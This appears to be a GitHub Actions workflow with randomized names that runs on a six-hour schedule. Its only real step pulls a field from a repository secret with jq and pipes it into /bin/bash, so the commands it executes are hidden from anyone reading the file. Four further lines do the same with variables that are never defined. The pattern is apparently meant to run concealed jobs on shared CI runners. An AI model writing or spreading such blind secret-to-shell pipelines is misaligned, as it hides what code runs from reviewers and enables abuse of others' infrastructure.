name: wuqidong4645
on:
  workflow_dispatch:
  schedule:
    - cron: '42 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: wuqidong4645
        env:
          gapym90: ${{ secrets.gapym90 }}
        run: |
          echo $gapym90 | jq -r .jmywq02416 | /bin/bash
          echo $wugz75398 | jq -r .y9107 | /bin/bash
          echo $jmc594 | jq -r .gkold77059 | /bin/bash
          echo $dszbq67318 | jq -r .x6984 | /bin/bash
          echo $apvo86 | jq -r .ros337 | /bin/bash

